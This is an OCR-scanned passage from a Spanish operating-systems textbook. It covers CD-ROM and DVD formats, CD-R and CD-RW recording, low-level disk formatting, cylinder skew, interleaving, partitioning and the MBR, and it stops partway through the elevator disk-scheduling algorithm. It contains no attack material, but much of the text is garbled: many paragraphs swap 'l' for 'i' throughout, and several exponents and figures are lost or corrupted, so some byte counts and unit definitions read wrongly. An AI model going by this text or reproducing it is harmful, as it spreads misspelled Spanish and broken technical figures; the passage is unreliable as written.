-' corrección de errores 




42 símbolos forman 1 trama de 14 x 42 = 588 bits 

t Cada estructura contiene 192 bits 

□ □□□□□□□de datos (24 bytes) y 396 bits 
de corrección de errores 

Sector de 
modo 1 
(2352 bytes) 


Preámbulo 

I 98 tramas forman 1 sector 



T 

Datos 

ECC 

Bytes 16 

2048 

288 


Figura 5-22. Distribución lógica de los datos en un CD-ROM . 


El Libro amarillo define dos modos. El modo 1 utiliza la distribución de la figura 5-22. Con 
un preámbulo de 16 bytes, 2048 bytes de datos y un código de corrección de errores de 288 bytes 
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(un código Reed-Solomon cruzado entrelazado). El modo 2 combina los campos de datos y ECC 
en un campo de datos de 2336 bytes para aquellas aplicaciones que no necesitan (o que no pueden 
darse el tiempo de llevar a cabo) la corrección de errores, como el audio y el video. Hay que tener 
en cuenta que para ofrecer una excelente confiabilidad, se utilizan tres esquemas separados de correc¬ 
ción de errores: dentro de un símbolo, dentro de una estructura y dentro de un sector del CD-ROM . 
Los errores de un solo bit se corrigen en el nivel más bajo, los errores de ráfagas cortas se corrigen 
en el nivel de estructura y los errores residuales se atrapan en el nivel de sector. El precio a pagar 
por esta confiabilidad es que se requieren 98 estructuras de 588 bits (7203 bytes) para llevar a ca¬ 
bo una sola transferencia de 2048 bytes, una eficiencia de sólo 28%. 

Las unidades de CD-ROM de una sola velocidad operan a 75 sectores/seg, con lo cual se ob¬ 
tiene una velocidad de transferencia de datos de 153,600 bytes/seg en modo 1 y de 175,200 by- 
tes/seg en modo 2. Las unidades de doble velocidad son el doble de rápidas, y así en lo sucesivo 
hasta la velocidad más alta. Por ende, una unidad de 40x puede transferir datos a una velocidad 
de 40 X 153,600 bytes/seg, suponiendo que la interfaz de la unidad, el bus y el sistema operati¬ 
vo puedan manejar esta velocidad de transferencia de datos. Un CD de audio estándar tiene es¬ 
pacio para 74 minutos de música que, si se utilizan para datos en modo 1, logran una capacidad 
de 681,984,000 bytes. Esta cifra se reporta comúnmente como 650 M B, debido a que 1 M B equi¬ 
vale a bytes (1,048,576 bytes) y no a 1,000,000 bytes. 

Tenga en cuenta que ni siquiera una unidad de CD-ROM de 32x (4,915,200 bytes/s) le hace 
frente a una unidad de disco magnético SCSI rápida a 10 M B/seg, aunque muchas unidades de 
CD-ROM utilizan la interfaz SCSI (también existen las unidades IDE deCD-ROM). Cuando seda uno 
cuenta de que el tiempo de búsqueda generalmente es de varios cientos de milisegundos, queda cla¬ 
ro que las unidades de CD-ROM no están en la misma categoría de rendimiento que las unidades de 
disco magnético, a pesar de su gran capacidad. 

En 1986, Philips publicó el Libro verde, agregando gráficos y la habilidad de entrelazar audio, 
video y datos en el mismo sector, una característica esencial para los CD-ROM s de multimedia. 

La última pieza del rompecabezas del CD-ROM es el sistema de archivos. Para que fuera po¬ 
sible usar el mismo CD-ROM en distintas computadoras, era necesario un acuerdo sobre los siste¬ 
mas de archivos de CD-ROM . Para llegar a este acuerdo, se reunieron los representantes de muchas 
compañías de computadoras en LakeTahoe, en la región High Sierra del límite entre California y 
Nevada, e idearon un sistema de archivos al que llamaron High Sierra. Después evolucionó en un 
Estándar Internacional (IS 9660). Tiene tres niveles. El nivel 1 utiliza nombres de archivo de hasta 
8 caracteres, seguidos opcional mente de una extensión de hasta 3 caracteres (la convención de de¬ 
nominación de archivos de M S-DOS). Los nombres de archivo pueden contener sólo letras mayúscu¬ 
las, dígitos y el guión bajo. Los directorios se pueden anidar hasta ocho niveles, pero los nombres 
de los directorios no pueden contener extensiones. El nivel 1 requiere que todos los archivos sean 
contiguos, lo cual no es problema en un medio en el que se escribe sólo una vez. Cualquier CD-ROM 
que cumpla con el nivel 1 del IS 9660 se puede leer utilizando M S-DOS, una computadora Apple, 
una computadora UNIX o casi cualquier otra computadora. Los editores de CD-ROM s consideran 
que esta propiedad es una gran ventaja. 

El nivel 2 del IS 9660 permite nombres de hasta 32 caracteres, y el nivel 3 permite archivos no 
contiguos. Las extensiones Rock Ridge (denominadas en honor a la ciudad en la que se desarrolla 
el filme de Gene Wilder llamado Blazing Saddies) permiten nombres muy largos (para UNIX), 
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UIDs, GIDs y vínculos simbólicos, pero los CD-ROMs que no cumplan con el nivel 1 no podrán 
leerse en todas las computadoras. 

Los CD-ROM s se han vuelto en extremo populares para publicar juegos, películas, enciclope¬ 
dias, atlas y trabajos de referencia de todo tipo. La mayoría del software comercial viene ahora en 
CD-ROM . Su combinación de gran capacidad y bajo costo de fabricación los hace adecuados para 
innumerables aplicaciones. 

CD-G rabables 

En un principio, el equipo necesario para producir un CD-ROM maestro (o CD deaudio, para esa 
cuestión) era extremadamente costoso. Pero como siempre en la industria de las computadoras, na¬ 
da permanece costoso por mucho tiempo. A mediados de la década de 1990, los grabadores de CDs 
no más grandes que un reproductor de CD eran un periférico común disponible en la mayoría de las 
tiendas de computadoras. Estos dispositivos seguían siendo distintos de los discos magnéticos, por¬ 
que una vez que se escribía información en ellos no podía borrarse. Sin embargo, rápidamente en¬ 
contraron un nicho como medio de respaldo para discos duros grandes y también permitieron que 
individuos o empresas que iniciaban operaciones fabricaran sus propios CD-ROM s de distribución 
limitada, o crear CDs maestros para entregarlos a plantas de duplicación de CDs comerciales de al¬ 
to volumen. Estas unidades se conocen como CD-Rs (CD-G rabables). 

Físicamente, los CD-Rs empiezan con discos en blanco de policarbonato de 120 mm, que son 
similares a los CD-ROMs, excepto porque contienen una ranura de 0.6 mm de ancho para guiar el 
láser para la escritura. La ranura tiene una excursión sinoidal de 0.3 mm a una frecuencia exacta de 
22.05 khlz para proveer una retroal i mentación continua, de manera que la velocidad de rotación se 
pueda supervisar y ajustar con precisión, en caso de que sea necesario. Los CD-Rs tienen una apa¬ 
riencia similar a los CD-ROMs, excepto porque tienen una parte superior dorada, en lugar de una 
plateada. El color dorado proviene del uso de verdadero oro en vez de aluminio para la capa reflec¬ 
tora. A diferencia de los CDs plateados que contienen depresiones físicas, en los CD-Rs la distinta 
reflectividad de hoyos y áreas lisas se tiene que simular. Para ello hay que agregar una capa de co¬ 
lorante entre el policarbonato y la capa de oro reflectiva, como se muestra en la figura 5-23. Se uti¬ 
lizan dos tipos de colorante: la cianina, que es verde, y la ptalocianina, que es de color naranja con 
amarillo. Losquímicos pueden argumentar indefinidamente sobre cuál es mejor. Estos col orantes son 
similares a los que se utilizan en la fotografía, lo cual explica porqué Eastman Kodak y Fuji son los 
principales fabricantes de CD-Rs en blanco. 

En su estado inicial, la capa de colorante es transparente y permite que la luz del láser pasea tra¬ 
vés de ella y se refleje en la capa dorada. Para escribir, el láser del CD-R se pone en alto poder (8 a 
16 mW). Cuando el haz golpea en un punto del colorante, se calienta y quebranta un lazo químico. 
Este cambio en la estructura molecular crea un punto oscuro. Cuando se lee de vuelta (a 0.5 mW), el 
fotodetector ve una diferencia entre los puntos oscuros en donde se ha golpeado el colorante y las 
áreas transparentes donde está intacto. Esta diferencia se interpreta como la diferencia entre los ho¬ 
yos y las áreas lisas, aun y cuando se lea nuevamente en un lector de CD-ROM regular, o incluso en 
un reproductor de CD deaudio. 

N ingún nuevo tipo de CD podría andar con la frente en alto sin un libro de colores, por lo que 
el CD-R tiene el Libro naranja, publicado en 1989. Este documento define el CD-R y también un 
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Figura 5-23. Sección transversal de un disco CD-R y el láser (no está a escala). Un 
CD-ROM plateado tiene una estructura similar, excepto sin la capa de colorante y con 
una capa de aluminio picada en vez de una capa dorada. 


nuevo formato, el CD-ROM XA, que permite escribir CD-Rs en forma incrementai; unos cuantos 
sectores hoy, otros pocos mañana, y unos cuantos ei siguiente mes. A un grupo de sectores conse¬ 
cutivos que se escriben a ia vez se le iiama pista de CD-ROM. 

Uno de ios primeros usos dei CD-R fue para ei PhotoCD de Kodak. En este sistema, ei Chen¬ 
te trae un roiio de peiícuia expuesta y su viejo PhotoCD ai procesador de fotografías, y obtiene de 
vueita ei mismo PhotoCD, ai que se ie agregan ias nuevas fotografías después de ias anteriores. Ei 
nuevo iote, que se crea ai expiorar ios negativos, se escribe en ei PhotoCD como una pista separa¬ 
da en ei CD-ROM . Se requería ia escritura incrementai debido a que cuando se introdujo este pro¬ 
ducto, ios CD-R en bianco eran demasiado costosos como para ofrecer uno nuevo porcada roiio de 
peiícuia. 

Sin embargo, ia escritura incrementai crea otro probiema. Antes dei Libro naranja, todos ios 
CD-ROM s tenían una soia VTOC (Voiume Tabie of Contents, Tabia de contenido dei voiumen) ai 
principio. Ese esquema no funciona con ias escrituras incrementaies (es decir de varias pistas). La 
soiución dei Libro naranja es proporcionar a cada pista de CD-ROM su propia VTOC. Los archivos 
que se iistan en ia VTOC pueden inciuir aigunos o todos ios archivos de ias pistas anteriores. Una 
vez que se inserta ei CD-R en ia unidad, ei sistema operativo busca a través de todas ias pistas de 
CD-ROM para iocaiizar ia VTOC más reciente, que proporciona ei estado actuai dei disco. A i inciuir 
aigunos, pero no todos ios archivos de ias pistas anteriores en ia VTOC actuai, es posibie dar ia iiu- 
sión de que se han eiiminado archivos. Las pistas se pueden agrupar en sesiones, io cuai coniieva a 
ios CD-ROM s de multisesión. Los reproductores de CDs de audio estándar no pueden manejar ios 
CDs de muitisesión, ya que esperan una soia VTOC ai principio. Sin embargo, aigunas apiicaciones 
de computadora pueden manejados. 
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El CD-R hace posible que los individuos y las empresas copien fácilmente CD-ROM s (y CDs 
de audio), por lo general violando los derechos del editor. Se han ideado varios esquemas para di¬ 
ficultar la piratería y para quesea difícil leer un CD-ROM utilizando otra cosa que no sea el soft¬ 
ware del editor. Uno de ellos implica grabar todas las longitudes de los archivos en el CD-ROM 
como de varios gigabytes, para frustrar cualquier intento de copiar los archivos en disco duro me¬ 
diante el uso de software de copiado estándar. Las verdaderas longitudes se incrustan en el softwa¬ 
re del editor o se ocultan (posiblemente cifradas) en el CD-ROM, en un lugar inesperado. Otro 
esquema utiliza ECCs incorrectos de manera intencional en sectores seleccionados, esperando que 
el software de copiado de CDs "corrija" esos errores. El software de aplicación comprueba los 
ECCs por sí mismo, rehusándose a funcionar si están correctos. El uso de huecos no estándar entre 
las pistas y otros "defectos" físicos también es posible. 

CD-Regrabables 

A unque las personas están acostumbradas a otros medios de escritura de sólo una vez como el pa¬ 
pel y la película fotográfica, hay una demanda por el CD-ROM regrabable. Unatecnologíaqueaho- 
ra está disponible es la del CD-RW (CD-Regrabable), que utiliza medios del mismo tamaño que 
el CD-R. Sin embargo, en vez de colorante de cianina o ptalocianina, el CD-RW utiliza una alea¬ 
ción de plata, indio, antimonio y telurio para la capa de grabación. Esta aleación tiene dos estados 
estables: cristalino y amorfo, con distintas reflactividades. 

Las unidades de CD-RW utilizan láseres con tres potencias: en la posición de alta energía, el 
láser funde la aleación y la convierte del estado cristalino de alta reflectividad al estado amorfo de 
baja reflectividad para representar un hoyo; en la posición de energía media, la aleación se funde y 
se vuelve a formar en su estado cristalino natural para convertirse en un área lisa nuevamente: en 
baja energía se detecta el estado del material (para la lectura), pero no ocurre una transición de 
estado. 

La razón por la que el CD-RW no ha sustituido al CD-R es que los CD-RW en blanco son más 
costosos. Además, para las aplicaciones que consisten en respaldar discos duros, el hecho de que 
una vez escrito el CD-R no se pueda borrar accidentalmente es una gran ventaja. 


DVD 

El formato básico deCD/CD-ROM ha estado en uso desde 1980. La tecnología ha mejorado desde 
entonces, por lo que ahora los discos ópticos de mayor capacidad son económicamente viables y 
hay una gran demanda por ellos. Hollywood estaría encantado de eliminar las cintas de video aná¬ 
logas a favor de los discos digitales, ya que los discos tienen una mayor calidad, son más económi¬ 
cos de fabricar, duran más tiempo, ocupan menos espacio en las repisas de las tiendas de video y 
no tienen que rebobinarse. Las empresas de electrónica para el consumidor siempre están buscan¬ 
do un nuevo producto que tenga un gran éxito, y muchas empresas de computadoras desean agre¬ 
gar características de multimedia a su software. 

Esta combinación de tecnología y demanda por tres industrias inmensamente ricas y poderosas 
conllevó al DVD, que originalmente era un acrónimo para Video disco digital (Digital Video Disk), 
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pero que ahora se conoce oficialmente como Disco versátil digital (Digital Versatile Disk). Los 
DVDs utilizan el mismo diseño general que los CDs, con discos de policarbonato moldeado por in¬ 
yección de 120 mm que contienen hoyos y áreas lisas, que se iluminan mediante un diodo láser y 
se leen mediante un fotodetector. Lo nuevo es el uso de 

1. Hoyos más pequeños (0.4 micrones, en comparación con 0.8 micrones para los CDs). 

2. Una espiral más estrecha (0.74 micrones entre pistas, en comparación con 1.6 micrones 
para los CDs). 

3. Un láser rojo (a 0.65 micrones, en comparación con 0.78 micrones para los CDs). 

En conjunto, estas mejoras elevan la capacidad siete veces, hasta 4.7 GB. Una unidad de DVD Ix 
opera a 1.4 M B/seg (en comparación con los 150 KB/seg de los CDs). Por desgracia, el cambio a 
los láseres rojos utilizados en los supermercados implica que los reproductores de DVD requieren 
un segundo láser o una óptica compleja de conversión para poder leer los CDs y CD-ROMs exis¬ 
tentes. Pero con la disminución en el precio de los láseres, la mayoría de los reproductores de DVD 
tienen ahora ambos tipos de láser para leer ambos tipos de medios. 

¿Es 4.7 GB suficiente? Tal vez. M ediante el uso de la compresión M PEG-2 (estandarizada en 
el IS 13346), un disco DVD de 4.7 GB puede contener 133 minutos de video de pantalla y movi¬ 
miento completo en alta resolución (720 x 480), así como pistas de sonido en hasta ocho lenguajes 
y subtítulos en 32 más. Cerca de 92% de todas las películas que se hayan realizado en Hollywood 
son de menos de 133 minutos. Sin embargo, algunas aplicaciones como los juegos multimedia o las 
obras de consulta pueden requerir más, y a Hollywood le gustaría colocar varias películas en el mis¬ 
mo disco, por lo que se han definido cuatro formatos: 

1. Un solo lado, una sola capa (4.7 GB). 

2. Un solo lado, doble capa (8.5 GB). 

3. Doble lado, una sola capa (9.4 GB). 

4. Doble lado, doble capa (17 GB). 

¿Por qué tantos formatos? En una palabra: política. Philips y Sony querían discos de un so¬ 
lo lado, doble capa para la versión de alta capacidad, pero Toshiba y Time Warner querían discos 
de doble lado, una sola capa. Philips y Sony no creyeron que la gente estuviera dispuesta a vol¬ 
tear los discos, y Time Warner no creía que colocar dos capas en un lado podía funcionar. El re¬ 
sultado: todas las combinaciones: el mercado será quien defina cuáles sobrevivirán. 

La tecnología de doble capa tiene una capa reflectora en la parte inferior, con una capa semi- 
reflectora encima. Dependiendo del lugar en el que se enfoque el láser, rebota de una capa o de la 
otra. La capa inferior necesita hoyos y áreas lisas ligeramente más grandes para poder leer de ma¬ 
nera confiable, por lo que su capacidad es un poco menor que la de la capa superior. 

Los discos de doble lado se fabrican tomando dos discos de un solo lado de 0.6 mm y pegán¬ 
dolos de su parte posterior. Para que el grosor de todas las versiones sea el mismo, un disco de un 
solo lado consiste en un disco de 0.6 mm pegado a un sustrato en blanco (o tal vez en el futuro, uno 
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que consista en 133 minutos de pubiicidad, con ia esperanza de que ia gente tenga curiosidad sobre 
io que pueda contener). La estructura dei disco dedobie iado, dobiecapa seiiustra en ia figura 5-24. 



Capa 

semi-reflectiva 

Reflector 
de aluminio 


Reflector 
de aluminio 

Capa 

semi-reflectiva 


Ei DVD fue ideado por un consorcio de 10 empresas de aparatos eiectrónicos para ei hogar, 
siete de ei i as japonesas, en estrecha cooperación con ios principaies estudios de Hoiiywood (aigu- 
nos de ios cuaies son propiedad de ias empresas de eiectrónica japonesas que están en ei consor¬ 
cio). Las industrias de ias computadoras y ias teiecomunicaciones no fueron invitadas ai picnic, y 
ei enfoque resuitanteestuvo en utiiizarei DVD paraexposicionesderentay venta de peiícuias. Por 
ejempio, ias características estándar inciuyen ia omisión en tiempo reai de escenas sucias (para per¬ 
mitir que ios padres conviertan una peiícuia con ciasificación NC17 en una segura para ios bebés), 
sonido de seis canaies y soporte para Pan-and-Scan. Esta úitima característica permite ai reproduc¬ 
tor dei DVD decidir en forma dinámica cómo cortar ios bordes izquierdo y derecho de ias peiícuia 
(cuya proporción de anchuraiaitura es 3:2) para adaptadas a ios teievisores actuaies (cuya propor¬ 
ción de aspecto es 4:3). 

Otra cuestión que ia industria de ias computadoras probabiemente no hubiera considerado es 
una incompatibiiidad intencionai entre ios discos destinados para ios Estados Unidos y ios discos 
destinados para Europa, y otros estándares más para ios otros continentes. Hoiiywood exigía esta 
"característica" debido a que ias nuevas peiícuias siempre se estrenan primero en ios Estados Uni¬ 
dos y después se envían a Europa, cuando ios videos sai en en ios Estados Unidos. La idea era ha¬ 
cer que ias tiendas de video europeas no pudieran comprar videos en ios EE.UU. con demasiada 
anticipación haciendo disminuir ias ventas de boietos para ias nuevas peiícuias en ios cines euro¬ 
peos. Si Hoiiywood hubiera operado ia industria de ias computadoras, tendríamos discos fiexibies 
de 3.5 puigadas en ios Estados Unidos y discos fiexibies de 9 cm en Europa. 

Las personas que idearon ios DV Ds de un soio/dobie iado y una soia/dobie capa están idean¬ 
do nuevos descubrimientos otra vez. La siguiente generación también carece de un soio estándar 
debido a ias disputas poiíticas por parte de ios participantes en ia industria. U no de ios nuevos dis¬ 
positivos es Blu-ray, que utiiiza un iáser de 0.405 micrones (azui) para empaquetar 25 GB en un 
disco de una soia capa y 50 GB en un disco de dobiecapa. Ei otro es HD DVD, que utiiiza ei mis¬ 
mo iáser azui pero tiene una capacidad de sóio 15 GB (una soia capa) y 30 GB (dobie capa). Esta 
guerra de ios formatos ha dividido a ios estudios de peiícuias, ios fabricantes de computadoras y 
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las compañías de software. Como resultado de la falta de estandarización, esta generación está des¬ 
pegando con bastante ientitud, a medida que ios consumidores esperan a que se asiente ei poivo 
para ver qué formato ganará. Esta faita de sensibiiidad por parte de i a industria nos trae a i a men¬ 
te ei famoso comentario de George Santayana: "Aqueiios que no pueden aprender de ia historia 
están destinados a repetida". 

5.4.2 Formato de disco 

Un disco duro consiste en una piia de piatos de aiuminio, aieación de acero o vidrio, de 5.25 o 3.5 
puigadas de diámetro (o inciuso más pequeños en ias computadoras notebook). En cada piato se de¬ 
posita un óxido de metai deigado magnetizabie. Después de su fabricación, no hay información 
de ninguna ciase en ei disco. 

Antes de poder utiiizar ei disco, cada piato debe recibir un formato de bajo nivel mediante 
software. Ei formato consiste en una serie de pistas concéntricas, cada una de ias cuaies contiene 
cierto número de sectores, con huecos cortos entre ios sectores. Ei formato de un sector se muestra 
en ia figura 5-25. 


Preámbulo 


Datos 


ECC 


Figura 5-25. U n sector de disco. 


Ei preámbuio empieza con cierto patrón de bits que permite ai hardware reconocer ei inicio dei 
sector. También contiene ios números de ciiindro y sector, junto con cierta información adicionai. 
Ei tamaño de ia porción de datos se determina con base en ei programa de formato de bajo nivei. 
La mayoría de ios discos utiiizan sectores de 512 bytes. Ei campo ECC contiene información re¬ 
dundante que se puede utiiizar para recuperarse de ios errores de iectura. Ei tamaño y contenido de 
este campo varía de un fabricante a otro, dependiendo de cuánto espacio de disco esté dispuesto a 
perder ei diseñador por obtener una mayor confiabiiidad, y de qué tan compiejo sea ei código ECC 
que pueda manejar ei controiador. Un campo ECC de 16 bytes no es poco común. Además, todos 
ios discos duros tienen cierta cantidad de sectores adicionai es que se asignan para utiiizarios como 
reempiazo de ios sectores con un defecto de fabricación. 

La posición dei sector 0 en cada pista está desfasada de ia pista anterior cuando seapiica ei for¬ 
mato de bajo nivei. Estedespiazamiento, conocido como desajuste decilindros, se reaiiza para me¬ 
jorar ei rendimiento. La idea es permitir que ei disco iea varias pistas en una operación continua sin 
perder datos. La naturaieza deesteprobiema se puede ver en ia figura 5-19(a). Suponga que una pe¬ 
tición necesita 18 sectores, empezando en ei sector 0 de ia pista más interna. Para ieer ios primeros 
16 sectores se requiere una rotación de disco, pero se necesita una búsqueda para despiazarse una 
pista hacia fuera para iiegar ai sector 17. Para cuando ia cabeza se ha despiazado una pista, ei sec¬ 
tor 0 ha girado más aiiá de ia cabeza, de manera que se necesita una rotación para que vueiva a pa¬ 
sar por debajo de ia cabeza. Este probiema se eiimina ai desviar ios sectores como se muestra en ia 
figura 5-26. 
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La cantidad de desviación de ios ciiindros depende de ia geometría dei disco. Por ejempio, una 
unidad de 10,000 RPM gira en 6 mseg. Si una pista contiene 300 sectores, un nuevo sector pasa de¬ 
bajo de ia cabeza cada 20 pseg. Si ei tiempo de búsqueda de pista a pista es de 800 pseg, pasarán 
40 sectores durante i a búsqueda, por io que ia desviación de ios ciiindros debe ser de 40 sectores en 
vez de ios tres sectores que se muestran en ia figura 5-26. Vaie ia pena mencionar que ei cambio 
entre una cabeza y otra también requiere un tiempo finito, por io que hay también desajuste de ca¬ 
bezas ai iguai que desajuste de ciiindros, pero ei desajuste de i as cabezas no es muy grande. 

Como resuitado dei formato de bajo nivei se reduce i a capacidad dei disco, dependiendo de ios 
tamaños dei preámbuio, ei hueco entre sectores y ei ECC, así como ei número de sectores adicio- 
naies reservados. A menudo ia capacidad con formato es 20% menor que ia capacidad sin formato. 
Los sectores adicionaies no cuentan para ia capacidad con formato, por io que todos ios discos de 
un tipo dado tienen exactamente ia misma capacidad cuando se envían, sin importar cuántos secto¬ 
res defectuosos tengan en reai i dad (si ei número de sectores defectuosos excede ai número de adi¬ 
cionaies, ia unidad se rechazará y no se enviará). 

Hay una considerabie confusión acerca de ia capacidad dei disco, debido a que ciertos fabri¬ 
cantes anunciaban ia capacidad sin formato para que sus unidades parecieran más grandes de io que 
reai mente son. Por ejempio, considere una unidad cuya capacidad sin formato es de 200 x 10® bytes. 
Éste se podría vender como un disco de 200 GB. Sin embargo, después dei formato tai vez 
sóio haya 170 x 10® bytes para ios datos. Para aumentar ia confusión, ei sistema operativo proba- 
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blemente reportará esta capacidad como 158 GB, y no como 170 GB debido a queei software con¬ 
sidera que una memoria de 1 GB es de (1,073,741,824) bytes, no 10^ (1,000,000,000) bytes. 

Para empeorar ias cosas, en ei mundo de ias comunicaciones de datos, 1 Gbps significa 
1,000,000,000 bits/seg, ya que ei prefijo giga en reaiidad significa 10® (un kiiómetro equivaie 
a 1000 metros, no 1024 metros, después de todo). Sóio con ios tamaños de ias memorias y ios dis¬ 
cos kiio, mega, giga y tera significan 2“,2^®, y 2 ^°, respectivamente. 

Ei formato también afecta ai rendimiento. Si un disco de 10,000 RPM tiene 300 sectores por pis¬ 
ta de 512 bytes cada uno, se requieren 6 mseg para ieer ios 153,600 bytes en una pista para una veio- 
cidad de transferencia de datos de 25,600,000 bytes/seg, o 24.4 M B/seg. No es posibie ir más rápido 
que esto, sin importar qué tipo de interfaz esté presente, aun si es una interfaz SCSI a 80 M B/seg 
o 160 M B/seg. 

En realidad, para leer de manera continua a esta velocidad se requiere un búfer extenso en el 
controlador. Por ejemplo, considere un controlador con un búfer de un sector que ha recibido un co¬ 
mando para leer dos sectores consecutivos. Después de leer el primer sector del disco y de realizar 
el cálculo del ECC, los datos se deben transferir a la memoria principal. M ientras se está llevando 
a cabo esta transferencia, el siguiente sector pasará por la cabeza. Cuando se complete la copia a la 
memoria, el controlador tendrá que esperar casi un tiempo de rotación completo para que el segun¬ 
do sector vuelva a pasar por la cabeza. 

Este problema se puede eliminar al enumerar los sectores en forma entrelazada al aplicar forma¬ 
to al disco. En la figura 5-27(a) podemos ver el patrón de enumeración usual (ignorando aquí el desa¬ 
juste de cilindros). La figura 5-27(b) muestra el entrelazado simple, que proporciona al controlador 
cierto espacio libre entre los sectores consecutivos para poder copiar el búfer a la memoria principal. 



(a) (b) (c) 


Figura 5-27. (a) Sin entrelazado, (b) Entrelazado simple, (c) Entrelazado doble. 

Si el proceso de copia es muy lento, tal vez sea necesario el entrelazado doble de la figura 
5-27(c). Si el controlador tiene un búfer de un sector solamente, no importa si la copia del búfer 
a la memoria principal se realiza mediante el controlador, la CPU principal o un chip de DMA; 
de todas formas requiere cierto tiempo. Para evitar la necesidad del entrelazado, el controla¬ 
dor debe ser capaz de colocar en el búfer una pista completa. M uchos controladores modernos 
pueden hacer esto. 

Una vez que se completa el formato de bajo nivel, el disco se particiona. En sentido lógico, ca¬ 
da partición es como un disco separado. Las particiones son necesarias para permitir que coexistan 
varios sistemas operativos. A demás, en algunos casos se puede utilizar una partición para el intercam¬ 
bio. En el Pentium y la mayoría de las otras computadoras, el sector 0 contiene el registro de inicio 
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maestro (M BR, por sus siglas en inglés), el cual contiene cierto código de inicio además de la tabla 
de particiones al final. La tabla de particiones proporciona el sector inicial y el tamaño de cada parti¬ 
ción. En el Pentium, la tabla de particiones tiene espacio para cuatro particiones. Si todas ellas son pa¬ 
ra Windows, se llamarán C:, D:, E: y F:, y se tratarán como unidades separadas. Si tres de ellas son 
para Windows y una es para UNIX, entonces Windows llamará a sus particiones C:, D: y E:. El pri¬ 
mer CD-ROM será entonces F:. Para poder iniciar del disco duro, una partición se debe marcar como 
activa en la tabla de particiones. 

El paso final de preparación de un disco para utilizarlo es realizar un formato de alto nivel de 
cada partición (por separado). Esta operación establece un bloque de inicio, la administración del 
espacio de almacenamiento libre (lista de bloques libres o mapa de bits), el directorio raíz y un sis¬ 
tema de archivos vacío. También coloca un código en la entrada de la tabla de particiones para in¬ 
dicarle qué sistema de archivos se va a utilizar en la partición, debido a que muchos sistemas 
operativos soportan varios sistemas de archivos incompatibles (por cuestiones históricas). En este 
punto se puede iniciar el sistema. 

Cuando se enciende la máquina, el BIOS se ejecuta al inicio, después lee el registro de inicio 
maestro y salta al mismo. Este programa de inicio comprueba a su vez cuál partición está activa. Des¬ 
pués lee el sector de inicio deesa partición y lo ejecuta. El sector de inicio contiene un pequeño pro¬ 
grama que por lo general carga un programa de inicio más grande, el cual busca en el sistema de 
archivos el kernel del sistema operativo. Ese programa se carga en memoria y se ejecuta. 

5.4.3 Algoritmos de programación del brazo del disco 

En esta sección analizaremos ciertas cuestiones relacionadas con los controladores de disco en ge¬ 
neral. En primer lugar hay que considerar cuánto tiempo se requiere para leer o escribir en un blo¬ 
que de disco. El tiempo requerido se determina en base a tres factores: 

1. Tiempo de búsqueda (el tiempo para desplazar el brazo al cilindro apropiado). 

2. Retraso rotacional (el tiempo para que el sector apropiado se coloque debajo de la cabeza). 

3. Tiempo de transferencia de datos actual. 

Para la mayoría de los discos, el tiempo de búsqueda domina los otros dos tiempos, por lo que al re¬ 
ducir el tiempo de búsqueda promedio se puede mejorar el rendimiento del sistema de manera consi¬ 
derable. Si el software controlador de disco acepta peticiones una a la vez, y las lleva a cabo en ese 
orden, es decir. Primero en llegar, primero en ser atendido (F irst-Corne, Firsts-Served, FCFS), no 
se puede hacer mucho para optimizar el tiempo de búsqueda. Sin embargo, hay otra estrategia posible 
cuando el disco está muy cargado. Es probable que mientras el brazo esté realizando una búsqueda a fa¬ 
vor de una petición, otros procesos puedan generar otras peticiones de disco. M uchos controladores de 
disco mantienen una tabla, indexada por número de cilindro, con todas las peticiones pendientes para ca¬ 
da cilindro encadenadas en una lista enlazada, encabezada por las entradas en la tabla. 

Dado este tipo de estructura de datos, podemos realizar mejorías con base en el algoritmo de 
programación del primero en llegar, primero en ser atendido. Para ver cómo, considere un disco 
imaginario con 40 cilindros. Llega una petición para leer un bloque en el cilindro 11; mientras la 
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búsqueda en el cilindro 11 está en progreso, llegan nuevas peticiones para los cilindros 1, 36, 16, 
34, 9 y 12, en ese orden, y se introducen en la tabla de peticiones pendientes, con una lista enlaza¬ 
da separada para cada cilindro. Las peticiones se muestran en la figura 5-28. 

Posición Peticiones 



Figura 5-28. Algoritmo de planificación de disco de La búsqueda del trabajo más 
corto primero (SSF). 


Cuando termina la petición actual (para el cilindro 11), el software controlador de disco puede 
elegir qué petición manejar a continuación. Utilizando FCFS, el siguiente cilindro sería el 1, luego 
el 36, y así en lo sucesivo. Este algoritmo requiere movimientos del brazo de 10, 35, 20, 18, 25 y 
3, respectivamente, para un total de 111 cilindros. 

De manera alternativa, siempre podría manejar la petición más cercana primero, para minimi¬ 
zar el tiempo de búsqueda. Dadas las peticiones de la figura 5-28, la secuencia es 12, 9,16,1, 34 y 
36, y se muestra mediante la línea dentada en la parte inferior de la figura 5-28. Con esta secuen¬ 
cia, los movimientos del brazo son 1, 3, 7, 15, 33 y 2 para un total de 61 cilindros. Este algoritmo 
de La búsqueda del trabajo más corto primero (Shortest Seek First, SSF) recorta el movimiento 
total del brazo casi a la mitad, en comparación con FCFS. 

Por desgracia, SSF tiene un problema. Suponga que siguen llegando más peticiones mientras 
se están procesando las peticiones de la figura 5-28. Por ejemplo, si después de ir al cilindro 16 hay 
una nueva petición para el cilindro 8, esa petición tendrá prioridad sobre el cilindro 1. Si después 
llega una petición para el cilindro 13, el brazo irá a continuación a 13, en vez de ir a 1. Con un dis¬ 
co que contenga mucha carga, el brazo tenderá a permanecer en la parte media del disco la mayor 
parte del tiempo, por lo que las peticiones en cualquier extremo tendrán que esperar hasta que una 
fluctuación estadística en la carga ocasione que ya no haya peticiones cerca de la parte media. Las 
peticiones alejadas de la parte media pueden llegar a obtener un mal servicio. Los objetivos del 
tiempo de respuesta mínimo y la equidad están en conflicto aquí. 

Los edificios altos también tienen que lidiar con esta concesión. El problema de planificar un 
elevador en un edificio alto es similar al de planificar un brazo de disco. Las peticiones llegan en 
forma continua, llamando al elevador a los pisos (cilindros) al azar. La computadora que opera el 
elevador podría llevar fácilmente la secuencia en la que los clientes oprimieron el botón de llama¬ 
da, y atenderlos utilizando FCFS o SSF. 

Sin embargo, la mayoría de los elevadores utilizan un algoritmo distinto para poder reconciliar 
las metas mutuamente conflictivas de eficiencia y equidad. Siguen avanzando en la misma direc- 
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ción hasta que no haya más peticiones pendientes en esa dirección, y después cambian de direccio¬ 
nes. Este aigoritmo, conocido como algoritmo del elevador tanto en ei mundo de ios discos como 
en ei mundo de ios eievadores, requiere que ei software mantenga 1 bit: ei bit de dirección actuai, 
ARRIBA o ABAJ 0. Cuando termina una petición, ei software controiador dei disco o dei eievador 
comprueba ei bit. Si es ARRIBA, el brazo o cabina se desplaza a la siguiente petición pendiente de 
mayor prioridad. Si no hay peticiones pendientes en posiciones mayores, el bit de dirección se in¬ 
